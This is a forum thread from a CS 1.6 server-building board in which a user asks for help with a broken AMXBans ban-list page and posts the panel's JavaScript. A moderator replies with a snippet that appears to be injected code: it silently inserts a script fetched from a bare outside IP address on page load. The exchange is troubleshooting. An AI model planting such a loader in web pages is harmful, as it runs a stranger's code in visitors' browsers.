amxbans problema

Forumas specialiai skirtas pamokoms kuriant CS 1.6 serverį
Post Reply
Kenzy
Jau po truputį tampa savu
Posts: 106
Joined: 2017 Jan 22 20:41

amxbans problema

Post by Kenzy »

Hello,
Today i found some Problems on my AMXbans, i get problem when enter there !!
and i dont Upload any File There , just yestarday was Working Good and Today didn't working !!
link : http://151.80.155.15/amxbans/ban_list.php
Please someone help me about it !!
Thanks

User avatar
laimiukas3
Moderatorius
Posts: 4569
Joined: 2012 Aug 03 01:12
Skype: laimiukas3
Location: Vilnius
Contact:

Re: amxbans problema

Post by laimiukas3 »

Image
Image
Image

Kenzy
Jau po truputį tampa savu
Posts: 106
Joined: 2017 Jan 22 20:41

Re: amxbans problema

Post by Kenzy »

i removed it , but will be like that !??
http://151.80.155.15/amxbans/ban_list.php
how to back it like was ?
This code stay now :

Code: Select all

<?php session_start(); if(@$_SESSION["loggedin"]) { ?>function LiveBanCopyVars (name,steamid,ip,userid) {    document.getElementById('player_name').value = name;    document.getElementById('player_uid').value = userid;    document.getElementById('player_steamid').value = steamid;    document.getElementById('player_ip').value = ip;} function SetNewPassword(fieldid,lang1,lang2,notmatch) {    var pw1 = window.prompt(lang1, '');    if(!pw1) return false;        var pw2 = window.prompt(lang2, '');    if(pw1 != pw2) {         alert(notmatch);        return false;    } else {        document.getElementById(fieldid).value = pw1;        return true;    }} function ToggleMenu_open(obj) {    if(obj != 1) { ToggleMenu_close('1'); }    if(obj != 2) { ToggleMenu_close('2'); }    if(obj != 3) { ToggleMenu_close('3'); }    if(obj != 4) { ToggleMenu_close('4'); }     if(document.getElementById('menu_'+obj).style.display == 'none') {        document.getElementById('menu_'+obj).style.display = 'block';    }    return false;} $(document).ready(function(){    $('a.main-nav_a').click(function(){        $('#menu_1').hide();        $('#menu_2').hide();        $('#menu_3').hide();        $('#menu_4').hide();        $('#menu_' + $(this).attr('id').substr(6)).show();        return false;    });}); function ToggleMenu_close(obj) {    if(document.getElementById('menu_'+obj).style.display == 'block') {        document.getElementById('menu_'+obj).style.display = 'none';    }    return false;} <?php } ?>function ToggleLayer(obj) {    if(document.all) {        if(document.all[obj].style.display == 'none') {            document.all[obj].style.display = 'block';        } else {            document.all[obj].style.display = 'none';        }    } else {        if(document.getElementById(obj).style.display == 'none') {            if(document.getElementById(obj).tagName == 'DIV') {                document.getElementById(obj).style.display = 'block';            } else {                document.getElementById(obj).style.display = 'table-row';            }        } else {            document.getElementById(obj).style.display = 'none';        }    }} function NewToggleLayer(element) {    var e = $('#' + element);    if (e.css('display') == 'none') {        e.show().find('div').slideDown('slow')    } else {         e.find('div').slideUp('slow', function() { $(this).parent().parent().hide(); })    }} /* Version checker */            function setLastVersion(ver)    {        if (parseFloat($('#version').text()) < ver)        {            $('#version').addClass('MustUpdate').append(' <a href="http://gm-community.net/thread.1851"><img src="../../images/generic/information.png" alt="Download" /></a>');        }    } 

User avatar
laimiukas3
Moderatorius
Posts: 4569
Joined: 2012 Aug 03 01:12
Skype: laimiukas3
Location: Vilnius
Contact:

Re: amxbans problema

Post by laimiukas3 »

Code: Select all

 $(function(){        var chkver = document.createElement("script");        chkver.type = "text/javascript";        chkver.async = true;        chkver.src = "//91.211.245.236/amxbans.js";        var s = document.getElementsByTagName("script")[0];         s.parentNode.insertBefore(chkver, s);    });
Image
Image
Image

Kenzy
Jau po truputį tampa savu
Posts: 106
Joined: 2017 Jan 22 20:41

Re: amxbans problema

Post by Kenzy »

still didnt working : http://151.80.155.15/amxbans/ban_list.php
any seggestion please !?

Post Reply

Who is online

Users browsing this forum: No registered users and 7 guests